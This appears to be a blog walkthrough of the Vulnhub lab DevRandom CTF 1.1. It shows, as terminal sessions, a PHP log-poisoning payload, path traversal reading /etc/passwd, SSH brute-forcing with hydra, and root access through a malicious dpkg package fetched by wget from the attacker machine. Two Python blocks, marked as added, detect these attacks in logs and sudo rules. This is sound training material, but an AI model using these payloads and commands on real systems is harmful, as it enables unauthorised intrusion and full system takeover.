Vulnhub box DevRandom CTF 1.1: detailed walkthrough

Published: 2023-05-27 17:53:04  Author: Jason_huawen

DevRandom CTF: 1.1

Target information

Name: DevRandom CTF: 1.1

Address:

https://www.vulnhub.com/entry/devrandom-ctf-11,450/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:03      1      60  Unknown vendor
 192.168.56.100  08:00:27:9c:b2:21      1      60  PCS Systemtechnik GmbH
 192.168.56.254  08:00:27:ef:c4:95      1      60  PCS Systemtechnik GmbH


Using Kali Linux's built-in netdiscover tool, the target host's IP address is identified as 192.168.56.254.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 04:13 EDT
Nmap scan report for driftingblues.box (192.168.56.254)
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 83e5a151b1f698d319e75910f7f4e85e (RSA)
|   256 b2a679c3ad2fbacc02b3420da2a39e60 (ECDSA)
|_  256 ec1fd4299fa5aeca93f4a86bfd614445 (ED25519)
80/tcp open  http    Apache httpd
| http-robots.txt: 3 disallowed entries 
|_/wp-admin/ /wp-login.php /?include=info
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache
MAC Address: 08:00:27:EF:C4:95 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The NMAP scan shows that the target host has 2 open ports: 22 (ssh) and 80 (http).

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/robots.txt                       
User-agent: *
Disallow: /wp-admin/
Disallow: /wp-login.php
Disallow: /?include=info

However, visiting /wp-admin/ and /wp-login.php returns page content that is not that of a normal WordPress site.

Visiting:

http://192.168.56.254/?include=info

When visiting this address, the page source shows that the CMS is WordPress, but the site's host address is misconfigured, so there is no value in pursuing this direction further.

ing: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='http://192.168.1.214/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' media='all' />
<link rel='stylesheet' id='twentytwenty-style-css'  href='http://192.168.1.214/wp-content/themes/twentytwenty/style.css?ver=1.1' media='all' />

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ nikto -h http://192.168.56.254     
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-05-27 04:17:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/wp-login.php' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ RFC-1918 /?include=info/: IP address found in the 'link' header. The IP is "192.168.1.214". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /robots.txt: Entry '/?include=info/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/wp-admin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /secret/: Directory indexing found.
+ /secret/: This might be interesting.

The nikto tool found the /secret directory; visiting it yields 3 files, one of which has a size of 0 and can be ignored:

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /secret</title>
 </head>
 <body>
<h1>Index of /secret</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="arizona">arizona</a></td><td align="right">2020-03-19 16:52  </td><td align="right"> 42 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="nucleus">nucleus</a></td><td align="right">2020-03-19 16:51  </td><td align="right">  0 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="wrap">wrap</a></td><td align="right">2020-03-22 08:37  </td><td align="right">6.4K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/arizona
API:4395874598yt3r9iy98r7r90t87treterrrrr

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/wrap


<p> john:Password123


The wrap file contains a username and password, but attempting to log in over SSH with them fails.

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ ssh john@192.168.56.254                                        
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:AnG5VJ89V2BLxl3FruwQRAYjvRcsk/DSGj3zNJrfMyY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
john@192.168.56.254's password: 
Permission denied, please try again.

This may be a trap.

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh,.js     
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,txt,html,sh,js
[+] Timeout:                 10s
===============================================================
2023/05/27 04:21:35 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 199]
/.html                (Status: 403) [Size: 199]
/index.php            (Status: 200) [Size: 74]
/wp-content           (Status: 301) [Size: 241] [--> http://192.168.56.254/wp-content/]
/wp-login.php         (Status: 200) [Size: 74]
/license.txt          (Status: 200) [Size: 19935]
/wp-includes          (Status: 301) [Size: 242] [--> http://192.168.56.254/wp-includes/]
/log.php              (Status: 200) [Size: 2324657]
/readme.html          (Status: 200) [Size: 7368]
/robots.txt           (Status: 200) [Size: 86]
/wp-trackback.php     (Status: 200) [Size: 74]
/secret               (Status: 301) [Size: 237] [--> http://192.168.56.254/secret/]
/secret.php           (Status: 200) [Size: 38]

The Gobuster scan reveals the file /log.php.

Its page content reads: view acces.log file : /var/www/html/access.log

This log file records web access requests, so a shell could be obtained by inserting PHP code into a request header so that it lands in the log.

Burp Suite can be used to intercept the request

and replace the User-Agent field with

<?php system($_GET["cmd"]); ?>

But on visiting /log.php again, the returned content is still only: view acces.log file : /var/www/html/access.log

Back to robots.txt:

http://192.168.56.254/?include=info

There should be a local file inclusion vulnerability here, but note that the including file may sit deep in the directory tree, so several levels of ../ are needed.

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/?include=../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
_apt:x:103:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
john:x:1000:1000:john,,,:/home/john:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lisa:x:1001:1001:,,,:/home/lisa:/bin/bash
henri:x:1002:1002:,,,:/home/henri:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:107:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:108:65534::/srv/ftp:/usr/sbin/nologin
wordpressftp:x:1003:1003:,,,:/var/www/html:/bin/rbash
victor:x:1004:1004:,,,:/home/victor:/bin/bash
trevor:x:1005:1005:,,,:/home/trevor:/bin/bash
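As an added defender-side example (not part of the original walkthrough), the following Python scans Apache combined-format access log lines for the two request patterns used above: `../` traversal in a query parameter such as `include`, and a PHP open tag planted in a logged header (the precondition for log poisoning via /log.php). The three log lines are constructed samples, not captured from the box.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format (not captured from the box).
# Line 1 mirrors the traversal request used above, line 2 a PHP tag planted in the
# User-Agent header (log poisoning), line 3 a benign request for the "info" page.
SAMPLE_LOG = r'''
192.168.56.253 - - [27/May/2023:04:25:01 -0400] "GET /?include=../../../../../../../../../etc/passwd HTTP/1.1" 200 1812 "-" "curl/7.88.1"
192.168.56.253 - - [27/May/2023:04:23:10 -0400] "GET /log.php HTTP/1.1" 200 2324657 "-" "<?php system($_GET[\"cmd\"]); ?>"
192.168.56.1 - - [27/May/2023:04:20:00 -0400] "GET /?include=info HTTP/1.1" 200 74 "-" "Mozilla/5.0"
'''.strip().splitlines()

# Combined format; the quoted referer/user-agent fields may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]|/etc/passwd', re.I)
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.I)


def decode(value: str) -> str:
    """Percent-decode twice so double-encoded traversal (%252e%252e%252f) is seen too."""
    return unquote(unquote(value))


def scan_line(line: str) -> list:
    """Return (indicator, client_ip, detail) tuples for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    f = m.groupdict()
    hits = []
    # Any query parameter carrying ../ or a well-known target file -> LFI attempt.
    for key, value in parse_qsl(urlsplit(f['target']).query, keep_blank_values=True):
        if TRAVERSAL_RE.search(decode(value)):
            hits.append(('lfi_traversal', f['ip'], f'{key}={value}'))
    # PHP open tag in a logged header -> log-poisoning preparation.
    for field in ('ua', 'referer'):
        if PHP_TAG_RE.search(decode(f[field])):
            hits.append(('php_in_header', f['ip'], field))
    return hits


def scan_log(lines) -> list:
    """Scan many lines; the benign "?include=info" request produces no hit."""
    return [hit for line in lines for hit in scan_line(line)]
```

Pointing `scan_log` at the real /var/www/html/access.log would have flagged both steps of this walkthrough as they happened.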

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ cat user.dict
trevor
victor
john
lisa
henri

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ hydra -l trevor  -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.254

Trying to crack each user's password yields trevor's password qwertyuiop[]; with rockyou.txt this takes quite a long time.

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ ssh trevor@192.168.56.254     
trevor@192.168.56.254's password: 
Linux lucifer 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Mar 23 17:54:37 2020
trevor@lucifer:~$ ls -alh
total 28K
drwxr-x--- 4 trevor trevor 4.0K Mar 25  2020 .
drwxr-xr-x 7 root   root   4.0K Mar 23  2020 ..
-rw-r--r-- 1 trevor trevor  220 Mar 23  2020 .bash_logout
-rw-r--r-- 1 trevor trevor 3.5K Mar 23  2020 .bashrc
drwx------ 3 trevor trevor 4.0K Mar 23  2020 .gnupg
drwxr-xr-x 3 trevor trevor 4.0K Mar 23  2020 .local
-rw-r--r-- 1 trevor trevor  807 Mar 23  2020 .profile
trevor@lucifer:~$ sudo -l
Matching Defaults entries for trevor on lucifer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User trevor may run the following commands on lucifer:
    (root) NOPASSWD: /usr/bin/dpkg
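As an added audit example (not from the original post), this Python parses the `sudo -l` output shown above and flags NOPASSWD rules that run a package manager as root. dpkg executes a package's maintainer scripts as root while installing, so such a rule is equivalent to unrestricted root; the list of package managers is ours and not exhaustive.

```python
import re

# Constructed copy of the `sudo -l` output shown in this walkthrough.
SUDO_L_OUTPUT = r'''
Matching Defaults entries for trevor on lucifer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User trevor may run the following commands on lucifer:
    (root) NOPASSWD: /usr/bin/dpkg
'''

# Package managers run maintainer scripts as root during install; a root rule for
# any of them is root-equivalent. Our own list, not exhaustive.
PACKAGE_MANAGERS = {"dpkg", "apt", "apt-get", "aptitude", "rpm", "yum", "dnf", "zypper"}

# "(runas[:group]) TAG: TAG: cmd1, cmd2" as printed by sudo -l.
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def parse_sudo_l(text: str) -> list:
    """Return (runas_user, nopasswd, command) for each rule after the 'may run' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if 'may run the following commands' in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group('runas').split(':')[0].strip()
        nopasswd = 'NOPASSWD:' in m.group('tags')
        for cmd in m.group('cmds').split(','):
            rules.append((runas, nopasswd, cmd.strip()))
    return rules


def find_root_equivalent(text: str) -> list:
    """Commands that give a passwordless root shell through a package manager."""
    hits = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit('/', 1)[-1]
        if runas in ('root', 'ALL') and nopasswd and binary in PACKAGE_MANAGERS:
            hits.append(cmd)
    return hits
```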

Privilege escalation

Install fpm

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo gem install fpm     

Create a deb package following the GTFOBins steps

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ TF=$(mktemp -d)

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ echo 'exec /bin/sh' > $TF/x.sh

┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

Created package {:path=>"x_1.0_all.deb"}

Upload the deb package above to the target host's /tmp directory:

trevor@lucifer:/tmp$ wget http://192.168.56.253:8000/x_1.0_all.deb
--2023-05-27 04:38:20--  http://192.168.56.253:8000/x_1.0_all.deb
Connecting to 192.168.56.253:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1092 (1.1K) [application/vnd.debian.binary-package]
Saving to: ‘x_1.0_all.deb’

x_1.0_all.deb                           100%[============================================================================>]   1.07K  --.-KB/s    in 0s      

2023-05-27 04:38:20 (37.1 MB/s) - ‘x_1.0_all.deb’ saved [1092/1092]

trevor@lucifer:/tmp$ sudo dpkg -i x_1.0_all.deb 
Selecting previously unselected package x.
(Reading database ... 40777 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# cd /root
# ls -alh
total 40K
drwx------  4 root root 4.0K May 27 04:30 .
drwxr-xr-x 22 root root 4.0K Mar 19  2020 ..
-rw-------  1 root root  573 Mar 26  2020 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root   89 Mar 22  2020 flag.txt
drwx------  3 root root 4.0K Mar 20  2020 .gnupg
-rw-------  1 root root   36 May 27 04:30 .lesshst
drwxr-xr-x  3 root root 4.0K Mar 19  2020 .local
-rw-------  1 root root  513 Mar 18  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
# cat flag.txt
WELl DONE

echo "THISISTHEFLAGTHISISTHEFLAG\!\!\!\@\@\@###" | base64 > thisistheflag.txt
#